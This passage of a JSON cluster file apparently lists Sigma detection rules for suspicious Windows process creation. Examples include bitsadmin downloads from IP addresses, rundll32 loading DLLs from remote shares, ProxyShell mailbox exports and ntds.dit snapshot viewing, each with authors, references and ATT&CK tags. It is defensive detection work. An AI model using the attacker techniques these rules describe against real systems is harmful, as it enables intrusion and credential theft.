"attack.t1564.001" ] }, "related": [ { "dest-uuid": "ec8fc7e2-b356-455c-8db5-2e37be158e7d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "efec536f-72e8-4656-8960-5e85d091345b", "value": "Set Suspicious Files as System Files Using Attrib.EXE" }, { "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-08-07", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_mailboxexport_share.yml", "level": "critical", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", "https://youtu.be/5mqid-7zp8k?t=2481", "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_mailboxexport_share.yml" ], "tags": [ "attack.exfiltration" ] }, "uuid": "889719ef-dd62-43df-86c3-768fb08dc7c0", "value": "Suspicious PowerShell Mailbox Export to Share" }, { "description": "Detects various command line and scripting engines/processes such as \"PowerShell\", \"Wscript\", \"Cmd\", etc. spawning a \"regsvr32\" instance.", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-26", "falsepositive": [ "Legitimate \".bat\", \".hta\", \".ps1\" or \".vbs\" scripts leverage legitimately often. Apply additional filter and exclusions as necessary", "Some legitimate Windows services" ], "filename": "proc_creation_win_regsvr32_susp_parent.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20171001085340/https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html", "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_susp_parent.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.010" ] }, "related": [ { "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ab37a6ec-6068-432b-a64e-2c7bf95b1d22", "value": "Scripting/CommandLine Process Spawned Regsvr32" }, { "description": "An attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver", "meta": { "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io, TactiKoolSec", "creation_date": "2022-04-28", "falsepositive": [ "Legitimate installation of a new screensaver" ], "filename": "proc_creation_win_rundll32_installscreensaver.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Libraries/Desk/", "https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1218.011/T1218.011.md#atomic-test-13---rundll32-with-deskcpl", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_installscreensaver.yml" ], "tags": [ "attack.t1218.011", "attack.defense-evasion" ] }, "related": [ { "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "15bd98ea-55f4-4d37-b09a-e7caa0fa2221", "value": "Rundll32 InstallScreenSaver Execution" }, { "description": "Detects the execution of \"ConfigSecurityPolicy.EXE\", a binary part of Windows Defender used to manage settings in Windows Defender.\nUsers can configure different pilot collections for each of the co-management workloads.\nIt can be abused by attackers in order to upload or download files.\n", "meta": { "author": "frack113", "creation_date": "2021-11-26", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_configsecuritypolicy_download_file.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/ConfigSecurityPolicy/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_configsecuritypolicy_download_file.yml" ], "tags": [ "attack.exfiltration", "attack.t1567" ] }, "related": [ { "dest-uuid": "40597f16-0963-4249-bf4c-ac93b7fb9807", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1f0f6176-6482-4027-b151-00071af39d7e", "value": "Arbitrary File Download Via ConfigSecurityPolicy.EXE" }, { "description": "Detects usage of bitsadmin downloading a file using an URL that contains an IP", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-06-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_bitsadmin_download_direct_ip.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://isc.sans.edu/diary/22264", "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_direct_ip.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.t1197", "attack.s0190", "attack.t1036.003" ] }, "related": [ { "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "99c840f2-2012-46fd-9141-c761987550ef", "value": "Suspicious Download From Direct IP Via Bitsadmin" }, { "description": "Detects a WMI backdoor in Exchange Transport Agents via WMI event filters", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2019-10-11", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wmi_backdoor_exchange_transport_agent.yml", "level": "critical", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/cglyer/status/1182391019633029120", "https://twitter.com/cglyer/status/1182389676876980224", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmi_backdoor_exchange_transport_agent.yml" ], "tags": [ "attack.persistence", "attack.t1546.003" ] }, "related": [ { "dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "797011dc-44f4-4e6f-9f10-a8ceefbe566b", "value": "WMI Backdoor Exchange Transport Agent" }, { "description": "Detects a suspicious call to the user32.dll function that locks the user workstation", "meta": { "author": "frack113", "creation_date": "2022-06-04", "falsepositive": [ "Scripts or links on the user desktop used to lock the workstation instead of Windows+L or the menu option" ], "filename": "proc_creation_win_rundll32_user32_dll.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://app.any.run/tasks/2aef9c63-f944-4763-b3ef-81eee209d128/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_user32_dll.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "3b5b0213-0460-4e3f-8937-3abf98ff7dcc", "value": "Suspicious Workstation Locking via Rundll32" }, { "description": "Detects usage of bitsadmin downloading a file from a suspicious domain", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-06-28", "falsepositive": [ "Some legitimate apps use this, but limited." ], "filename": "proc_creation_win_bitsadmin_download_file_sharing_domains.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", "https://isc.sans.edu/diary/22264", "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", "https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_file_sharing_domains.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.t1197", "attack.s0190", "attack.t1036.003" ] }, "related": [ { "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8518ed3d-f7c9-4601-a26c-f361a4256a0c", "value": "Suspicious Download From File-Sharing Website Via Bitsadmin" }, { "description": "Detects potentially suspicious execution of the Regasm/Regsvcs utilities with an uncommon extension.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-02-13", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_regasm_regsvcs_uncommon_extension_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.fortiguard.com/threat-signal-report/4718?s=09", "https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/", "https://lolbas-project.github.io/lolbas/Binaries/Regasm/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regasm_regsvcs_uncommon_extension_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.009" ] }, "related": [ { "dest-uuid": "c48a67ee-b657-45c1-91bf-6cdbe27205f8", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e9f8f8cc-07cc-4e81-b724-f387db9175e4", "value": "Potentially Suspicious Execution Of Regasm/Regsvcs With Uncommon Extension" }, { "description": "Detects the execution of the \"jsc.exe\" (JScript Compiler).\nAttacker might abuse this in order to compile JScript files on the fly and bypassing application whitelisting.\n", "meta": { "author": "frack113", "creation_date": "2022-05-02", "falsepositive": [ "Legitimate use to compile JScript by developers." ], "filename": "proc_creation_win_jsc_execution.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.phpied.com/make-your-javascript-a-windows-exe/", "https://lolbas-project.github.io/lolbas/Binaries/Jsc/", "https://twitter.com/DissectMalware/status/998797808907046913", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_jsc_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1127" ] }, "related": [ { "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "52788a70-f1da-40dd-8fbd-73b5865d6568", "value": "JScript Compiler Execution" }, { "description": "Detects attempts to enumerate file shares, printer shares and sessions using \"net.exe\" with the \"view\" flag.", "meta": { "author": "Endgame, JHasenbusch (ported for oscd.community)", "creation_date": "2018-10-30", "falsepositive": [ "Legitimate use of net.exe utility by legitimate user" ], "filename": "proc_creation_win_net_view_share_and_sessions_enum.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", "https://eqllib.readthedocs.io/en/latest/analytics/b8a94d2f-dc75-4630-9d73-1edc6bd26fff.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_view_share_and_sessions_enum.yml" ], "tags": [ "attack.discovery", "attack.t1018" ] }, "related": [ { "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "62510e69-616b-4078-b371-847da438cc03", "value": "Share And Session Enumeration Using Net.EXE" }, { "description": "Detects a set of suspicious network related commands often used in recon stages", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-02-07", "falsepositive": [ "False positives depend on scripts and administrative tools used in the monitored environment" ], "filename": "proc_creation_win_nslookup_domain_discovery.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nslookup_domain_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1087", "attack.t1082", "car.2016-03-001" ] }, "related": [ { "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e6313acd-208c-44fc-a0ff-db85d572e90e", "value": "Network Reconnaissance Activity" }, { "description": "Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file.", "meta": { "author": "Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", "creation_date": "2022-10-21", "falsepositive": [ "File located in the AppData folder with trusted signature" ], "filename": "proc_creation_win_office_onenote_susp_child_processes.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-e34e43eb5666427602ddf488b2bf3b545bd9aae81af3e6f6c7949f9652abdf18", "https://micahbabinski.medium.com/detecting-onenote-one-malware-delivery-407e9321ecf0", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_onenote_susp_child_processes.yml" ], "tags": [ "attack.t1566", "attack.t1566.001", "attack.initial-access" ] }, "related": [ { "dest-uuid": "a62a8db3-f23a-4d8f-afd6-9dbc77e7813b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "2e34237d-8574-43f6-aace-ae2915de8597", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c27515df-97a9-4162-8a60-dc0eeb51b775", "value": "Suspicious Microsoft OneNote Child Process" }, { "description": "Detects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege", "meta": { "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community", "creation_date": "2020-10-13", "falsepositive": [ "System administrator usage", "Anti virus products", "WindowsApps located in \"C:\\Program Files\\WindowsApps\\\"" ], "filename": "proc_creation_win_susp_always_install_elevated_windows_installer.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-48-638.jpg", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_always_install_elevated_windows_installer.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cd951fdc-4b2f-47f5-ba99-a33bf61e3770", "value": "Always Install Elevated Windows Installer" }, { "description": "Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-05-27", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_regedit_trustedinstaller.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/1kwpeter/status/1397816101455765504", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_trustedinstaller.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1548" ] }, "related": [ { "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "883835a7-df45-43e4-bf1d-4268768afda4", "value": "Regedit as Trusted Installer" }, { "description": "Detects the execution of SOAPHound, a .NET tool for collecting Active Directory data, using specific command-line arguments that may indicate an attempt to extract sensitive AD information.\n", "meta": { "author": "@kostastsale", "creation_date": "2024-01-26", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_soaphound_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/FalconForceTeam/SOAPHound", "https://medium.com/falconforce/soaphound-tool-to-collect-active-directory-data-via-adws-165aca78288c", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_soaphound_execution.yml" ], "tags": [ "attack.discovery", "attack.t1087" ] }, "related": [ { "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e92a4287-e072-4a40-9739-370c106bb750", "value": "HackTool - SOAPHound Execution" }, { "description": "Detects suspicious child processes of Excel which could be an indicator of lateral movement leveraging the \"ActivateMicrosoftApp\" Excel DCOM object.\n", "meta": { "author": "Aaron Stratton", "creation_date": "2023-11-13", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_office_excel_dcom_lateral_movement.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/office/vba/api/excel.xlmsapplication", "https://posts.specterops.io/lateral-movement-abuse-the-power-of-dcom-excel-application-3c016d0d9922", "https://github.com/grayhatkiller/SharpExShell", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_excel_dcom_lateral_movement.yml" ], "tags": [ "attack.t1021.003", "attack.lateral-movement" ] }, "related": [ { "dest-uuid": "68a0c5ed-bee2-4513-830d-5b0d650139bd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "551d9c1f-816c-445b-a7a6-7a3864720d60", "value": "Potential Excel.EXE DCOM Lateral Movement Via ActivateMicrosoftApp" }, { "description": "Detects when a user installs certificates by using CertOC.exe to loads the target DLL file.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-10-23", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_certoc_load_dll.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/sblmsrsn/status/1445758411803480072?s=20", "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-fe98e74189873d6df72a15df2eaa0315c59ba9cdaca93ecd68afc4ea09194ef2", "https://lolbas-project.github.io/lolbas/Binaries/Certoc/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certoc_load_dll.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "242301bc-f92f-4476-8718-78004a6efd9f", "value": "DLL Loaded via CertOC.EXE" }, { "description": "Detects an uncommon parent process of \"LINK.EXE\".\nLink.EXE in Microsoft incremental linker. Its a utility usually bundled with Visual Studio installation.\nMultiple utilities often found in the same folder (editbin.exe, dumpbin.exe, lib.exe, etc) have a hardcode call to the \"LINK.EXE\" binary without checking its validity.\nThis would allow an attacker to sideload any binary with the name \"link.exe\" if one of the aforementioned tools get executed from a different location.\nBy filtering the known locations of such utilities we can spot uncommon parent process of LINK.EXE that might be suspicious or malicious.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-22", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_link_uncommon_parent_process.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/0gtweet/status/1560732860935729152", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_link_uncommon_parent_process.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6e968eb1-5f05-4dac-94e9-fd0c5cb49fd6", "value": "Uncommon Link.EXE Parent Process" }, { "description": "Detects rundll32 execution where the DLL is located on a remote location (share)", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-10", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_rundll32_unc_path.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_unc_path.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1021.002", "attack.t1218.011" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5cdb711b-5740-4fb2-ba88-f7945027afac", "value": "Rundll32 UNC Path Execution" }, { "description": "Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit.", "meta": { "author": "Furkan Caliskan (@caliskanfurkan_)", "creation_date": "2020-07-04", "falsepositive": [ "Legitimate admin usage" ], "filename": "proc_creation_win_pua_ditsnap.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2020/06/21/snatch-ransomware/", "https://web.archive.org/web/20201124182207/https://github.com/yosqueoy/ditsnap", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_ditsnap.yml" ], "tags": [ "attack.credential-access", "attack.t1003.003" ] }, "related": [ { "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d3b70aad-097e-409c-9df2-450f80dc476b", "value": "PUA - DIT Snapshot Viewer" }, { "description": "Detects usage of the copy builtin cmd command to copy files with the \".dmp\"/\".dump\" extension from a remote share", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-27", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_cmd_copy_dmp_from_share.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_copy_dmp_from_share.yml" ], "tags": [ "attack.credential-access" ] }, "uuid": "044ba588-dff4-4918-9808-3f95e8160606", "value": "Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE" }, { "description": "Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-01-21", "falsepositive": [ "Legitimate deinstallation by administrative staff" ], "filename": "proc_creation_win_susp_disable_raccine.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/Neo23x0/Raccine", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_disable_raccine.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc", "value": "Raccine Uninstall" }, { "description": "Detects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges from a uncommon parent location.", "meta": { "author": "frack113, Tim Shelton (update fp)", "creation_date": "2022-12-05", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_elevated_system_shell_uncommon_parent.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/Wh04m1001/SysmonEoP", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_elevated_system_shell_uncommon_parent.yml" ], "tags": [ "attack.privilege-escalation", "attack.defense-evasion", "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "178e615d-e666-498b-9630-9ed363038101", "value": "Elevated System Shell Spawned From Uncommon Parent Location" }, { "description": "Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries,\nwhich is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from \"svchost\"\n", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @gott_cyber", "creation_date": "2019-06-29", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_explorer_break_process_tree.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/CyberRaiju/status/1273597319322058752", "https://securityboulevard.com/2019/09/deobfuscating-ostap-trickbots-34000-line-javascript-downloader/", "https://twitter.com/nas_bench/status/1535322450858233858", "https://twitter.com/bohops/status/1276357235954909188?s=12", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_explorer_break_process_tree.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "949f1ffb-6e85-4f00-ae1e-c3c5b190d605", "value": "Explorer Process Tree Break" }, { "description": "Detects execution of \"tar.exe\" in order to extract compressed file.\nAdversaries may abuse various utilities in order to decompress data to avoid detection.\n", "meta": { "author": "AdmU3", "creation_date": "2023-12-19", "falsepositive": [ "Likely" ], "filename": "proc_creation_win_tar_extraction.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage", "https://unit42.paloaltonetworks.com/chromeloader-malware/", "https://lolbas-project.github.io/lolbas/Binaries/Tar/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tar_extraction.yml" ], "tags": [ "attack.collection", "attack.exfiltration", "attack.t1560", "attack.t1560.001" ] }, "related": [ { "dest-uuid": "53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bf361876-6620-407a-812f-bfe11e51e924", "value": "Compressed File Extraction Via Tar.EXE" }, { "description": "Detects potentially suspicious file downloads from file sharing domains using PowerShell.exe", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2024-02-23", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_download_susp_file_sharing_domains.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv", "https://labs.withsecure.com/publications/fin7-target-veeam-servers", "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708", "https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download_susp_file_sharing_domains.yml" ], "tags": [ "attack.execution" ] }, "uuid": "b6e04788-29e1-4557-bb14-77f761848ab8", "value": "Potentially Suspicious File Download From File Sharing Domain Via PowerShell.EXE" }, { "description": "Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-06", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_inline_win_api_access.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/m417z/status/1566674631788007425", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_inline_win_api_access.yml" ], "tags": [ "attack.execution", "attack.t1106" ] }, "related": [ { "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ba3f5c1b-6272-4119-9dbd-0bc8d21c2702", "value": "Potential WinAPI Calls Via CommandLine" }, { "description": "Detects inline Windows shell commands redirecting output via the \">\" symbol to a suspicious location.\nThis technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as \"hostname\" and \"dir\" to files for future exfiltration.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-12", "falsepositive": [ "Legitimate admin or third party scripts used for diagnostic collection might generate some false positives" ], "filename": "proc_creation_win_cmd_redirection_susp_folder.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ 